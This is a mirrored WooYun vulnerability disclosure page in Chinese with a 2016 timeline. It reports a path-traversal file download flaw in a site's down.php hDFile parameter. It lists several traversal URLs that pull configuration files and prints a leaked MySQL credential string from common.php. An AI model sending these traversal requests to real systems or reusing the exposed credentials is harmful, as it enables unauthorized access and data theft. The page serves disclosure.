乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-13: 细节已通知厂商并且等待厂商处理中 2016-01-14: 厂商已经确认,细节仅向厂商公开 2016-01-24: 细节向核心白帽子及相关领域专家公开 2016-02-03: 细节向普通白帽子公开 2016-02-13: 细节向实习白帽子公开 2016-02-22: 细节向公众公开
rt
目标:http://**.**.**.**构造,
http://**.**.**.**/chinese_trad/03_support/down.php?hDFile=../index.php
配置文件
http://**.**.**.**/chinese_trad/03_support/down.php?hDFile=../include/php_script/common.php
common.php中
$DB_str = "mysql,localhost,waltop,waltopcom,waltop1011";
其他一些
http://**.**.**.**/chinese_trad/03_support/down.php?hDFile=../chinese_trad/03_support/down.phphttp://**.**.**.**/chinese_trad/03_support/down.php?hDFile=../index.phphttp://**.**.**.**/chinese_trad/03_support/down.php?hDFile=../include/php_script/common.phphttp://**.**.**.**/chinese_trad/03_support/down.php?hDFile=../include/php_script/database/DB_class.phphttp://**.**.**.**/chinese_trad/03_support/down.php?hDFile=../include/php_script/sql/Mysql_class.phphttp://**.**.**.**/chinese_trad/03_support/down.php?hDFile=../admin/index.php…
..
危害等级:高
漏洞Rank:17
确认时间:2016-01-14 03:43
感謝通報
暂无